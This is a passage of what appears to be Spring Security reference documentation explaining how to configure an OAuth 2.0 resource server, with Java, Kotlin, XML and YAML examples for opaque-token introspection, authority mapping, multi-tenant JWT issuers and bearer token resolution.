this.delegate.convert(claims);\n\n String username = (String) convertedClaims.get(\"user_name\");\n convertedClaims.put(\"sub\", username);\n\n return convertedClaims;\n }\n}\n```\n\nAnd then, the instance can be supplied like normal:\n\n```java\n@Bean\nJwtDecoder jwtDecoder() {\n NimbusJwtDecoder jwtDecoder = NimbusJwtDecoder.withJwkSetUri(jwkSetUri).build();\n jwtDecoder.setClaimSetConverter(new UsernameSubClaimAdapter());\n return jwtDecoder;\n}\n```\n\n[[oauth2resourceserver-jwt-timeouts]]\n=== Configuring Timeouts\n\nBy default, Resource Server uses connection and socket timeouts of 30 seconds each for coordinating with the authorization server.\n\nThis may be too short in some scenarios.\nFurther, it doesn't take into account more sophisticated patterns like back-off and discovery.\n\nTo adjust the way in which Resource Server connects to the authorization server, `NimbusJwtDecoder` accepts an instance of `RestOperations`:\n\n```java\n@Bean\npublic JwtDecoder jwtDecoder(RestTemplateBuilder builder) {\n RestOperations rest = builder\n .setConnectionTimeout(60000)\n .setReadTimeout(60000)\n .build();\n\n NimbusJwtDecoder jwtDecoder = NimbusJwtDecoder.withJwkSetUri(jwkSetUri).restOperations(rest).build();\n return jwtDecoder;\n}\n```\n\n[[oauth2resourceserver-opaque-minimalconfiguration]]\n=== Minimal Configuration for Introspection\n\nTypically, an opaque token can be verified via an https:\/\/tools.ietf.org\/html\/rfc7662[OAuth 2.0 Introspection Endpoint], hosted by the authorization server.\nThis can be handy when revocation is a requirement.\n\nWhen using https:\/\/spring.io\/projects\/spring-boot[Spring Boot], configuring an application as a resource server that uses introspection consists of two basic steps.\nFirst, include the needed dependencies and second, indicate the introspection endpoint details.\n\n[[oauth2resourceserver-opaque-introspectionuri]]\n==== Specifying the Authorization Server\n\nTo specify where the introspection endpoint is, simply do:\n\n[source,yaml]\n----\nsecurity:\n oauth2:\n resourceserver:\n opaque-token:\n introspection-uri: https:\/\/idp.example.com\/introspect\n client-id: client\n client-secret: secret\n----\n\nWhere `https:\/\/idp.example.com\/introspect` is the introspection endpoint hosted by your authorization server and `client-id` and `client-secret` are the credentials needed to hit that endpoint.\n\nResource Server will use these properties to further self-configure and subsequently validate incoming JWTs.\n\n[NOTE]\nWhen using introspection, the authorization server's word is the law.\nIf the authorization server responses that the token is valid, then it is.\n\nAnd that's it!\n\n==== Startup Expectations\n\nWhen this property and these dependencies are used, Resource Server will automatically configure itself to validate Opaque Bearer Tokens.\n\nThis startup process is quite a bit simpler than for JWTs since no endpoints need to be discovered and no additional validation rules get added.\n\n==== Runtime Expectations\n\nOnce the application is started up, Resource Server will attempt to process any request containing an `Authorization: Bearer` header:\n\n```http\nGET \/ HTTP\/1.1\nAuthorization: Bearer some-token-value # Resource Server will process this\n```\n\nSo long as this scheme is indicated, Resource Server will attempt to process the request according to the Bearer Token specification.\n\nGiven an Opaque Token, Resource Server will\n\n1. Query the provided introspection endpoint using the provided credentials and the token\n2. Inspect the response for an `{ 'active' : true }` attribute\n3. Map each scope to an authority with the prefix `SCOPE_`\n\nThe resulting `Authentication#getPrincipal`, by default, is a Spring Security `{security-api-url}org\/springframework\/security\/oauth2\/core\/OAuth2AuthenticatedPrincipal.html[OAuth2AuthenticatedPrincipal]` object, and `Authentication#getName` maps to the token's `sub` property, if one is present.\n\nFrom here, you may want to jump to:\n\n* <<oauth2resourceserver-opaque-attributes,Looking Up Attributes Post-Authentication>>\n* <<oauth2resourceserver-opaque-authorization-extraction,Extracting Authorities Manually>>\n* <<oauth2resourceserver-opaque-jwt-introspector,Using Introspection with JWTs>>\n\n[[oauth2resourceserver-opaque-attributes]]\n=== Looking Up Attributes Post-Authentication\n\nOnce a token is authenticated, an instance of `BearerTokenAuthentication` is set in the `SecurityContext`.\n\nThis means that it's available in `@Controller` methods when using `@EnableWebMvc` in your configuration:\n\n[source,java]\n----\n@GetMapping(\"\/foo\")\npublic String foo(BearerTokenAuthentication authentication) {\n return authentication.getTokenAttributes().get(\"sub\") + \" is the subject\";\n}\n----\n\nSince `BearerTokenAuthentication` holds an `OAuth2AuthenticatedPrincipal`, that also means that it's available to controller methods, too:\n\n[source,java]\n----\n@GetMapping(\"\/foo\")\npublic String foo(@AuthenticationPrincipal OAuth2AuthenticatedPrincipal principal) {\n return principal.getAttribute(\"sub\") + \" is the subject\";\n}\n----\n\n==== Looking Up Attributes Via SpEL\n\nOf course, this also means that attributes can be accessed via SpEL.\n\nFor example, if using `@EnableGlobalMethodSecurity` so that you can use `@PreAuthorize` annotations, you can do:\n\n```java\n@PreAuthorize(\"principal?.attributes['sub'] == 'foo'\")\npublic String forFoosEyesOnly() {\n return \"foo\";\n}\n```\n\n[[oauth2resourceserver-opaque-sansboot]]\n=== Overriding or Replacing Boot Auto Configuration\n\nThere are two `@Bean` s that Spring Boot generates on Resource Server's behalf.\n\nThe first is a `WebSecurityConfigurerAdapter` that configures the app as a resource server.\nWhen use Opaque Token, this `WebSecurityConfigurerAdapter` looks like:\n\n.Default Opaque Token Configuration\n====\n.Java\n[source,java,role=\"primary\"]\n----\nprotected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorize -> authorize\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(OAuth2ResourceServerConfigurer::opaqueToken);\n}\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\noverride fun configure(http: HttpSecurity) {\n http {\n authorizeRequests {\n authorize(anyRequest, authenticated)\n }\n oauth2ResourceServer {\n opaqueToken { }\n }\n }\n}\n----\n====\n\nIf the application doesn't expose a `WebSecurityConfigurerAdapter` bean, then Spring Boot will expose the above default one.\n\nReplacing this is as simple as exposing the bean within the application:\n\n.Custom Opaque Token Configuration\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@EnableWebSecurity\npublic class MyCustomSecurityConfiguration extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorize -> authorize\n .mvcMatchers(\"\/messages\/**\").hasAuthority(\"SCOPE_message:read\")\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2 -> oauth2\n .opaqueToken(opaqueToken -> opaqueToken\n .introspector(myIntrospector())\n )\n );\n }\n}\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n@EnableWebSecurity\nclass MyCustomSecurityConfiguration : WebSecurityConfigurerAdapter() {\n override fun configure(http: HttpSecurity) {\n http {\n authorizeRequests {\n authorize(\"\/messages\/**\", hasAuthority(\"SCOPE_message:read\"))\n authorize(anyRequest, authenticated)\n }\n oauth2ResourceServer {\n opaqueToken {\n introspector = myIntrospector()\n }\n }\n }\n }\n}\n----\n====\n\nThe above requires the scope of `message:read` for any URL that starts with `\/messages\/`.\n\nMethods on the `oauth2ResourceServer` DSL will also override or replace auto configuration.\n\nFor example, the second `@Bean` Spring Boot creates is an `OpaqueTokenIntrospector`, which decodes `String` tokens into validated instances of `OAuth2AuthenticatedPrincipal`:\n\n[source,java]\n----\n@Bean\npublic OpaqueTokenIntrospector introspector() {\n return new NimbusOpaqueTokenIntrospector(introspectionUri, clientId, clientSecret);\n}\n----\n\nIf the application doesn't expose a `OpaqueTokenIntrospector` bean, then Spring Boot will expose the above default one.\n\nAnd its configuration can be overridden using `introspectionUri()` and `introspectionClientCredentials()` or replaced using `introspector()`.\n\nOr, if you're not using Spring Boot at all, then both of these components - the filter chain and a `OpaqueTokenIntrospector` can be specified in XML.\n\nThe filter chain is specified like so:\n\n.Default Opaque Token Configuration\n====\n.Xml\n[source,xml,role=\"primary\"]\n----\n<http>\n <intercept-uri pattern=\"\/**\" access=\"authenticated\"\/>\n <oauth2-resource-server>\n <opaque-token introspector-ref=\"opaqueTokenIntrospector\"\/>\n <\/oauth2-resource-server>\n<\/http>\n----\n====\n\nAnd the `OpaqueTokenIntrospector` like so:\n\n.Opaque Token Introspector\n====\n.Xml\n[source,xml,role=\"primary\"]\n----\n<bean id=\"opaqueTokenIntrospector\"\n class=\"org.springframework.security.oauth2.server.resource.introspection.NimbusOpaqueTokenIntrospector\">\n <constructor-arg value=\"${spring.security.oauth2.resourceserver.opaquetoken.introspection_uri}\"\/>\n <constructor-arg value=\"${spring.security.oauth2.resourceserver.opaquetoken.client_id}\"\/>\n <constructor-arg value=\"${spring.security.oauth2.resourceserver.opaquetoken.client_secret}\"\/>\n<\/bean>\n----\n====\n\n[[oauth2resourceserver-opaque-introspectionuri-dsl]]\n==== Using `introspectionUri()`\n\nAn authorization server's Introspection Uri can be configured <<oauth2resourceserver-opaque-introspectionuri,as a configuration property>> or it can be supplied in the DSL:\n\n.Introspection URI Configuration\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@EnableWebSecurity\npublic class DirectlyConfiguredIntrospectionUri extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorize -> authorize\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2 -> oauth2\n .opaqueToken(opaqueToken -> opaqueToken\n .introspectionUri(\"https:\/\/idp.example.com\/introspect\")\n .introspectionClientCredentials(\"client\", \"secret\")\n )\n );\n }\n}\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n@EnableWebSecurity\nclass DirectlyConfiguredIntrospectionUri : WebSecurityConfigurerAdapter() {\n override fun configure(http: HttpSecurity) {\n http {\n authorizeRequests {\n authorize(anyRequest, authenticated)\n }\n oauth2ResourceServer {\n opaqueToken {\n introspectionUri = \"https:\/\/idp.example.com\/introspect\"\n introspectionClientCredentials(\"client\", \"secret\")\n }\n }\n }\n }\n}\n----\n\n.Xml\n[source,xml,role=\"secondary\"]\n----\n<bean id=\"opaqueTokenIntrospector\"\n class=\"org.springframework.security.oauth2.server.resource.introspection.NimbusOpaqueTokenIntrospector\">\n <constructor-arg value=\"https:\/\/idp.example.com\/introspect\"\/>\n <constructor-arg value=\"client\"\/>\n <constructor-arg value=\"secret\"\/>\n<\/bean>\n----\n====\n\nUsing `introspectionUri()` takes precedence over any configuration property.\n\n[[oauth2resourceserver-opaque-introspector-dsl]]\n==== Using `introspector()`\n\nMore powerful than `introspectionUri()` is `introspector()`, which will completely replace any Boot auto configuration of `OpaqueTokenIntrospector`:\n\n.Introspector Configuration\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@EnableWebSecurity\npublic class DirectlyConfiguredIntrospector extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorize -> authorize\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2 -> oauth2\n .opaqueToken(opaqueToken -> opaqueToken\n .introspector(myCustomIntrospector())\n )\n );\n }\n}\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n@EnableWebSecurity\nclass DirectlyConfiguredIntrospector : WebSecurityConfigurerAdapter() {\n override fun configure(http: HttpSecurity) {\n http {\n authorizeRequests {\n authorize(anyRequest, authenticated)\n }\n oauth2ResourceServer {\n opaqueToken {\n introspector = myCustomIntrospector()\n }\n }\n }\n }\n}\n----\n\n.Xml\n[source,xml,role=\"secondary\"]\n----\n<http>\n <intercept-uri pattern=\"\/**\" access=\"authenticated\"\/>\n <oauth2-resource-server>\n <opaque-token introspector-ref=\"myCustomIntrospector\"\/>\n <\/oauth2-resource-server>\n<\/http>\n----\n====\n\nThis is handy when deeper configuration, like <<oauth2resourceserver-opaque-authorization-extraction,authority mapping>>, <<oauth2resourceserver-opaque-jwt-introspector,JWT revocation>>, or <<oauth2resourceserver-opaque-timeouts,request timeouts>>, is necessary.\n\n[[oauth2resourceserver-opaque-introspector-bean]]\n==== Exposing a `OpaqueTokenIntrospector` `@Bean`\n\nOr, exposing a `OpaqueTokenIntrospector` `@Bean` has the same effect as `introspector()`:\n\n[source,java]\n----\n@Bean\npublic OpaqueTokenIntrospector introspector() {\n return new NimbusOpaqueTokenIntrospector(introspectionUri, clientId, clientSecret);\n}\n----\n\n[[oauth2resourceserver-opaque-authorization]]\n=== Configuring Authorization\n\nAn OAuth 2.0 Introspection endpoint will typically return a `scope` attribute, indicating the scopes (or authorities) it's been granted, for example:\n\n`{ ..., \"scope\" : \"messages contacts\"}`\n\nWhen this is the case, Resource Server will attempt to coerce these scopes into a list of granted authorities, prefixing each scope with the string \"SCOPE_\".\n\nThis means that to protect an endpoint or method with a scope derived from an Opaque Token, the corresponding expressions should include this prefix:\n\n.Authorization Opaque Token Configuration\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@EnableWebSecurity\npublic class MappedAuthorities extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorizeRequests -> authorizeRequests\n .mvcMatchers(\"\/contacts\/**\").hasAuthority(\"SCOPE_contacts\")\n .mvcMatchers(\"\/messages\/**\").hasAuthority(\"SCOPE_messages\")\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(OAuth2ResourceServerConfigurer::opaqueToken);\n }\n}\n----\n\n.Xml\n[source,xml,role=\"secondary\"]\n----\n<http>\n <intercept-uri pattern=\"\/contacts\/**\" access=\"hasAuthority('SCOPE_contacts')\"\/>\n <intercept-uri pattern=\"\/messages\/**\" access=\"hasAuthority('SCOPE_messages')\"\/>\n <oauth2-resource-server>\n <opaque-token introspector-ref=\"opaqueTokenIntrospector\"\/>\n <\/oauth2-resource-server>\n<\/http>\n----\n====\n\nOr similarly with method security:\n\n```java\n@PreAuthorize(\"hasAuthority('SCOPE_messages')\")\npublic List<Message> getMessages(...) {}\n```\n\n[[oauth2resourceserver-opaque-authorization-extraction]]\n==== Extracting Authorities Manually\n\nBy default, Opaque Token support will extract the scope claim from an introspection response and parse it into individual `GrantedAuthority` instances.\n\nFor example, if the introspection response were:\n\n[source,json]\n----\n{\n \"active\" : true,\n \"scope\" : \"message:read message:write\"\n}\n----\n\nThen Resource Server would generate an `Authentication` with two authorities, one for `message:read` and the other for `message:write`.\n\nThis can, of course, be customized using a custom `OpaqueTokenIntrospector` that takes a look at the attribute set and converts in its own way:\n\n[source,java]\n----\npublic class CustomAuthoritiesOpaqueTokenIntrospector implements OpaqueTokenIntrospector {\n private OpaqueTokenIntrospector delegate =\n new NimbusOpaqueTokenIntrospector(\"https:\/\/idp.example.org\/introspect\", \"client\", \"secret\");\n\n public OAuth2AuthenticatedPrincipal introspect(String token) {\n OAuth2AuthenticatedPrincipal principal = this.delegate.introspect(token);\n return new DefaultOAuth2AuthenticatedPrincipal(\n principal.getName(), principal.getAttributes(), extractAuthorities(principal));\n }\n\n private Collection<GrantedAuthority> extractAuthorities(OAuth2AuthenticatedPrincipal principal) {\n List<String> scopes = principal.getAttribute(OAuth2IntrospectionClaimNames.SCOPE);\n return scopes.stream()\n .map(SimpleGrantedAuthority::new)\n .collect(Collectors.toList());\n }\n}\n----\n\nThereafter, this custom introspector can be configured simply by exposing it as a `@Bean`:\n\n[source,java]\n----\n@Bean\npublic OpaqueTokenIntrospector introspector() {\n return new CustomAuthoritiesOpaqueTokenIntrospector();\n}\n----\n\n[[oauth2resourceserver-opaque-timeouts]]\n=== Configuring Timeouts\n\nBy default, Resource Server uses connection and socket timeouts of 30 seconds each for coordinating with the authorization server.\n\nThis may be too short in some scenarios.\nFurther, it doesn't take into account more sophisticated patterns like back-off and discovery.\n\nTo adjust the way in which Resource Server connects to the authorization server, `NimbusOpaqueTokenIntrospector` accepts an instance of `RestOperations`:\n\n```java\n@Bean\npublic OpaqueTokenIntrospector introspector(RestTemplateBuilder builder) {\n RestOperations rest = builder\n .basicAuthentication(clientId, clientSecret)\n .setConnectionTimeout(60000)\n .setReadTimeout(60000)\n .build();\n\n return new NimbusOpaqueTokenIntrospector(introspectionUri, rest);\n}\n```\n\n[[oauth2resourceserver-opaque-jwt-introspector]]\n=== Using Introspection with JWTs\n\nA common question is whether or not introspection is compatible with JWTs.\nSpring Security's Opaque Token support has been designed to not care about the format of the token -- it will gladly pass any token to the introspection endpoint provided.\n\nSo, let's say that you've got a requirement that requires you to check with the authorization server on each request, in case the JWT has been revoked.\n\nEven though you are using the JWT format for the token, your validation method is introspection, meaning you'd want to do:\n\n[source,yaml]\n----\nspring:\n security:\n oauth2:\n resourceserver:\n opaque-token:\n introspection-uri: https:\/\/idp.example.org\/introspection\n client-id: client\n client-secret: secret\n----\n\nIn this case, the resulting `Authentication` would be `BearerTokenAuthentication`.\nAny attributes in the corresponding `OAuth2AuthenticatedPrincipal` would be whatever was returned by the introspection endpoint.\n\nBut, let's say that, oddly enough, the introspection endpoint only returns whether or not the token is active.\nNow what?\n\nIn this case, you can create a custom `OpaqueTokenIntrospector` that still hits the endpoint, but then updates the returned principal to have the JWTs claims as the attributes:\n\n[source,java]\n----\npublic class JwtOpaqueTokenIntrospector implements OpaqueTokenIntrospector {\n private OpaqueTokenIntrospector delegate =\n new NimbusOpaqueTokenIntrospector(\"https:\/\/idp.example.org\/introspect\", \"client\", \"secret\");\n private JwtDecoder jwtDecoder = new NimbusJwtDecoder(new ParseOnlyJWTProcessor());\n\n public OAuth2AuthenticatedPrincipal introspect(String token) {\n OAuth2AuthenticatedPrincipal principal = this.delegate.introspect(token);\n try {\n Jwt jwt = this.jwtDecoder.decode(token);\n return new DefaultOAuth2AuthenticatedPrincipal(jwt.getClaims(), NO_AUTHORITIES);\n } catch (JwtException e) {\n throw new OAuth2IntrospectionException(e);\n }\n }\n\n private static class ParseOnlyJWTProcessor extends DefaultJWTProcessor<SecurityContext> {\n \tJWTClaimsSet process(SignedJWT jwt, SecurityContext context)\n throws JOSEException {\n return jwt.getJWTClaimSet();\n }\n }\n}\n----\n\nThereafter, this custom introspector can be configured simply by exposing it as a `@Bean`:\n\n[source,java]\n----\n@Bean\npublic OpaqueTokenIntrospector introspector() {\n return new JwtOpaqueTokenIntropsector();\n}\n----\n\n[[oauth2resourceserver-opaque-userinfo]]\n=== Calling a `\/userinfo` Endpoint\n\nGenerally speaking, a Resource Server doesn't care about the underlying user, but instead about the authorities that have been granted.\n\nThat said, at times it can be valuable to tie the authorization statement back to a user.\n\nIf an application is also using `spring-security-oauth2-client`, having set up the appropriate `ClientRegistrationRepository`, then this is quite simple with a custom `OpaqueTokenIntrospector`.\nThis implementation below does three things:\n\n* Delegates to the introspection endpoint, to affirm the token's validity\n* Looks up the appropriate client registration associated with the `\/userinfo` endpoint\n* Invokes and returns the response from the `\/userinfo` endpoint\n\n[source,java]\n----\npublic class UserInfoOpaqueTokenIntrospector implements OpaqueTokenIntrospector {\n private final OpaqueTokenIntrospector delegate =\n new NimbusOpaqueTokenIntrospector(\"https:\/\/idp.example.org\/introspect\", \"client\", \"secret\");\n private final OAuth2UserService oauth2UserService = new DefaultOAuth2UserService();\n\n private final ClientRegistrationRepository repository;\n\n \/\/ ... constructor\n\n @Override\n public OAuth2AuthenticatedPrincipal introspect(String token) {\n OAuth2AuthenticatedPrincipal authorized = this.delegate.introspect(token);\n Instant issuedAt = authorized.getAttribute(ISSUED_AT);\n Instant expiresAt = authorized.getAttribute(EXPIRES_AT);\n ClientRegistration clientRegistration = this.repository.findByRegistrationId(\"registration-id\");\n OAuth2AccessToken token = new OAuth2AccessToken(BEARER, token, issuedAt, expiresAt);\n OAuth2UserRequest oauth2UserRequest = new OAuth2UserRequest(clientRegistration, token);\n return this.oauth2UserService.loadUser(oauth2UserRequest);\n }\n}\n----\n\nIf you aren't using `spring-security-oauth2-client`, it's still quite simple.\nYou will simply need to invoke the `\/userinfo` with your own instance of `WebClient`:\n\n[source,java]\n----\npublic class UserInfoOpaqueTokenIntrospector implements OpaqueTokenIntrospector {\n private final OpaqueTokenIntrospector delegate =\n new NimbusOpaqueTokenIntrospector(\"https:\/\/idp.example.org\/introspect\", \"client\", \"secret\");\n private final WebClient rest = WebClient.create();\n\n @Override\n public OAuth2AuthenticatedPrincipal introspect(String token) {\n OAuth2AuthenticatedPrincipal authorized = this.delegate.introspect(token);\n return makeUserInfoRequest(authorized);\n }\n}\n----\n\nEither way, having created your `OpaqueTokenIntrospector`, you should publish it as a `@Bean` to override the defaults:\n\n[source,java]\n----\n@Bean\nOpaqueTokenIntrospector introspector() {\n return new UserInfoOpaqueTokenIntrospector(...);\n}\n----\n\n[[oauth2reourceserver-opaqueandjwt]]\n=== Supporting both JWT and Opaque Token\n\nIn some cases, you may have a need to access both kinds of tokens.\nFor example, you may support more than one tenant where one tenant issues JWTs and the other issues opaque tokens.\n\nIf this decision must be made at request-time, then you can use an `AuthenticationManagerResolver` to achieve it, like so:\n\n[source,java]\n----\n@Bean\nAuthenticationManagerResolver<HttpServletRequest> tokenAuthenticationManagerResolver() {\n BearerTokenResolver bearerToken = new DefaultBearerTokenResolver();\n JwtAuthenticationProvider jwt = jwt();\n OpaqueTokenAuthenticationProvider opaqueToken = opaqueToken();\n\n return request -> {\n if (useJwt(request)) {\n return jwt::authenticate;\n } else {\n return opaqueToken::authenticate;\n }\n }\n}\n----\n\nNOTE: The implementation of `useJwt(HttpServletRequest)` will likely depend on custom request material like the path.\n\nAnd then specify this `AuthenticationManagerResolver` in the DSL:\n\n.Authentication Manager Resolver\n====\n.Java\n[source,java,role=\"primary\"]\n----\nhttp\n .authorizeRequests(authorize -> authorize\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2 -> oauth2\n .authenticationManagerResolver(this.tokenAuthenticationManagerResolver)\n );\n----\n\n.Xml\n[source,xml,role=\"secondary\"]\n----\n<http>\n <oauth2-resource-server authentication-manager-resolver-ref=\"tokenAuthenticationManagerResolver\"\/>\n<\/http>\n----\n====\n\n[[oauth2resourceserver-multitenancy]]\n=== Multi-tenancy\n\nA resource server is considered multi-tenant when there are multiple strategies for verifying a bearer token, keyed by some tenant identifier.\n\nFor example, your resource server may accept bearer tokens from two different authorization servers.\nOr, your authorization server may represent a multiplicity of issuers.\n\nIn each case, there are two things that need to be done and trade-offs associated with how you choose to do them:\n\n1. Resolve the tenant\n2. Propagate the tenant\n\n==== Resolving the Tenant By Claim\n\nOne way to differentiate tenants is by the issuer claim. Since the issuer claim accompanies signed JWTs, this can be done with the `JwtIssuerAuthenticationManagerResolver`, like so:\n\n.Multitenancy Tenant by JWT Claim\n====\n.Java\n[source,java,role=\"primary\"]\n----\nJwtIssuerAuthenticationManagerResolver authenticationManagerResolver = new JwtIssuerAuthenticationManagerResolver\n (\"https:\/\/idp.example.org\/issuerOne\", \"https:\/\/idp.example.org\/issuerTwo\");\n\nhttp\n .authorizeRequests(authorize -> authorize\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2 -> oauth2\n .authenticationManagerResolver(authenticationManagerResolver)\n );\n----\n\n.Xml\n[source,xml,role=\"secondary\"]\n----\n<http>\n <oauth2-resource-server authentication-manager-resolver-ref=\"authenticationManagerResolver\"\/>\n<\/http>\n\n<bean id=\"authenticationManagerResolver\"\n class=\"org.springframework.security.oauth2.server.resource.authentication.JwtIssuerAuthenticationManagerResolver\">\n <constructor-arg>\n <list>\n <value>https:\/\/idp.example.org\/issuerOne<\/value>\n <value>https:\/\/idp.example.org\/issuerTwo<\/value>\n <\/list>\n <\/constructor-arg>\n<\/bean>\n----\n====\n\nThis is nice because the issuer endpoints are loaded lazily.\nIn fact, the corresponding `JwtAuthenticationProvider` is instantiated only when the first request with the corresponding issuer is sent.\nThis allows for an application startup that is independent from those authorization servers being up and available.\n\n===== Dynamic Tenants\n\nOf course, you may not want to restart the application each time a new tenant is added.\nIn this case, you can configure the `JwtIssuerAuthenticationManagerResolver` with a repository of `AuthenticationManager` instances, which you can edit at runtime, like so:\n\n[source,java]\n----\nprivate void addManager(Map<String, AuthenticationManager> authenticationManagers, String issuer) {\n\tJwtAuthenticationProvider authenticationProvider = new JwtAuthenticationProvider\n\t (JwtDecoders.fromIssuerLocation(issuer));\n\tauthenticationManagers.put(issuer, authenticationProvider::authenticate);\n}\n\n\/\/ ...\n\nJwtIssuerAuthenticationManagerResolver authenticationManagerResolver =\n new JwtIssuerAuthenticationManagerResolver(authenticationManagers::get);\n\nhttp\n .authorizeRequests(authorize -> authorize\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2 -> oauth2\n .authenticationManagerResolver(authenticationManagerResolver)\n );\n----\n\nIn this case, you construct `JwtIssuerAuthenticationManagerResolver` with a strategy for obtaining the `AuthenticationManager` given the issuer.\nThis approach allows us to add and remove elements from the repository (shown as a `Map` in the snippet) at runtime.\n\nNOTE: It would be unsafe to simply take any issuer and construct an `AuthenticationManager` from it.\nThe issuer should be one that the code can verify from a trusted source like a whitelist.\n\n===== Parsing the Claim Only Once\n\nYou may have observed that this strategy, while simple, comes with the trade-off that the JWT is parsed once by the `AuthenticationManagerResolver` and then again by the `JwtDecoder` later on in the request.\n\nThis extra parsing can be alleviated by configuring the `JwtDecoder` directly with a `JWTClaimSetAwareJWSKeySelector` from Nimbus:\n\n[source,java]\n----\n@Component\npublic class TenantJWSKeySelector\n implements JWTClaimSetAwareJWSKeySelector<SecurityContext> {\n\n\tprivate final TenantRepository tenants; <1>\n\tprivate final Map<String, JWSKeySelector<SecurityContext>> selectors = new ConcurrentHashMap<>(); <2>\n\n\tpublic TenantJWSKeySelector(TenantRepository tenants) {\n\t\tthis.tenants = tenants;\n\t}\n\n\t@Override\n\tpublic List<? extends Key> selectKeys(JWSHeader jwsHeader, JWTClaimsSet jwtClaimsSet, SecurityContext securityContext)\n\t\t\tthrows KeySourceException {\n\t\treturn this.selectors.computeIfAbsent(toTenant(jwtClaimsSet), this::fromTenant)\n\t\t\t\t.selectJWSKeys(jwsHeader, securityContext);\n\t}\n\n\tprivate String toTenant(JWTClaimsSet claimSet) {\n\t\treturn (String) claimSet.getClaim(\"iss\");\n\t}\n\n\tprivate JWSKeySelector<SecurityContext> fromTenant(String tenant) {\n\t\treturn Optional.ofNullable(this.tenantRepository.findById(tenant)) <3>\n\t\t .map(t -> t.getAttrbute(\"jwks_uri\"))\n\t\t\t\t.map(this::fromUri)\n\t\t\t\t.orElseThrow(() -> new IllegalArgumentException(\"unknown tenant\"));\n\t}\n\n\tprivate JWSKeySelector<SecurityContext> fromUri(String uri) {\n\t\ttry {\n\t\t\treturn JWSAlgorithmFamilyJWSKeySelector.fromJWKSetURL(new URL(uri)); <4>\n\t\t} catch (Exception e) {\n\t\t\tthrow new IllegalArgumentException(e);\n\t\t}\n\t}\n}\n----\n<1> A hypothetical source for tenant information\n<2> A cache for `JWKKeySelector`s, keyed by tenant identifier\n<3> Looking up the tenant is more secure than simply calculating the JWK Set endpoint on the fly - the lookup acts as a tenant whitelist\n<4> Create a `JWSKeySelector` via the types of keys that come back from the JWK Set endpoint - the lazy lookup here means that you don't need to configure all tenants at startup\n\nThe above key selector is a composition of many key selectors.\nIt chooses which key selector to use based on the `iss` claim in the JWT.\n\nNOTE: To use this approach, make sure that the authorization server is configured to include the claim set as part of the token's signature.\nWithout this, you have no guarantee that the issuer hasn't been altered by a bad actor.\n\nNext, we can construct a `JWTProcessor`:\n\n[source,java]\n----\n@Bean\nJWTProcessor jwtProcessor(JWTClaimSetJWSKeySelector keySelector) {\n\tConfigurableJWTProcessor<SecurityContext> jwtProcessor =\n new DefaultJWTProcessor();\n\tjwtProcessor.setJWTClaimSetJWSKeySelector(keySelector);\n\treturn jwtProcessor;\n}\n----\n\nAs you are already seeing, the trade-off for moving tenant-awareness down to this level is more configuration.\nWe have just a bit more.\n\nNext, we still want to make sure you are validating the issuer.\nBut, since the issuer may be different per JWT, then you'll need a tenant-aware validator, too:\n\n[source,java]\n----\n@Component\npublic class TenantJwtIssuerValidator implements OAuth2TokenValidator<Jwt> {\n\tprivate final TenantRepository tenants;\n\tprivate final Map<String, JwtIssuerValidator> validators = new ConcurrentHashMap<>();\n\n\tpublic TenantJwtIssuerValidator(TenantRepository tenants) {\n\t\tthis.tenants = tenants;\n\t}\n\n\t@Override\n\tpublic OAuth2TokenValidatorResult validate(Jwt token) {\n\t\treturn this.validators.computeIfAbsent(toTenant(token), this::fromTenant)\n\t\t\t\t.validate(token);\n\t}\n\n\tprivate String toTenant(Jwt jwt) {\n\t\treturn jwt.getIssuer();\n\t}\n\n\tprivate JwtIssuerValidator fromTenant(String tenant) {\n\t\treturn Optional.ofNullable(this.tenants.findById(tenant))\n\t\t .map(t -> t.getAttribute(\"issuer\"))\n\t\t\t\t.map(JwtIssuerValidator::new)\n\t\t\t\t.orElseThrow(() -> new IllegalArgumentException(\"unknown tenant\"));\n\t}\n}\n----\n\nNow that we have a tenant-aware processor and a tenant-aware validator, we can proceed with creating our `JwtDecoder`:\n\n[source,java]\n----\n@Bean\nJwtDecoder jwtDecoder(JWTProcessor jwtProcessor, OAuth2TokenValidator<Jwt> jwtValidator) {\n\tNimbusJwtDecoder decoder = new NimbusJwtDecoder(processor);\n\tOAuth2TokenValidator<Jwt> validator = new DelegatingOAuth2TokenValidator<>\n\t\t\t(JwtValidators.createDefault(), this.jwtValidator);\n\tdecoder.setJwtValidator(validator);\n\treturn decoder;\n}\n----\n\nWe've finished talking about resolving the tenant.\n\nIf you've chosen to resolve the tenant by something other than a JWT claim, then you'll need to make sure you address your downstream resource servers in the same way.\nFor example, if you are resolving it by subdomain, you may need to address the downstream resource server using the same subdomain.\n\nHowever, if you resolve it by a claim in the bearer token, read on to learn about <<oauth2resourceserver-bearertoken-resolver,Spring Security's support for bearer token propagation>>.\n\n[[oauth2resourceserver-bearertoken-resolver]]\n=== Bearer Token Resolution\n\nBy default, Resource Server looks for a bearer token in the `Authorization` header.\nThis, however, can be customized in a couple of ways.\n\n==== Reading the Bearer Token from a Custom Header\n\nFor example, you may have a need to read the bearer token from a custom header.\nTo achieve this, you can wire a `HeaderBearerTokenResolver` instance into the DSL, as you can see in the following example:\n\n.Custom Bearer Token Header\n====\n.Java\n[source,java,role=\"primary\"]\n----\nhttp\n 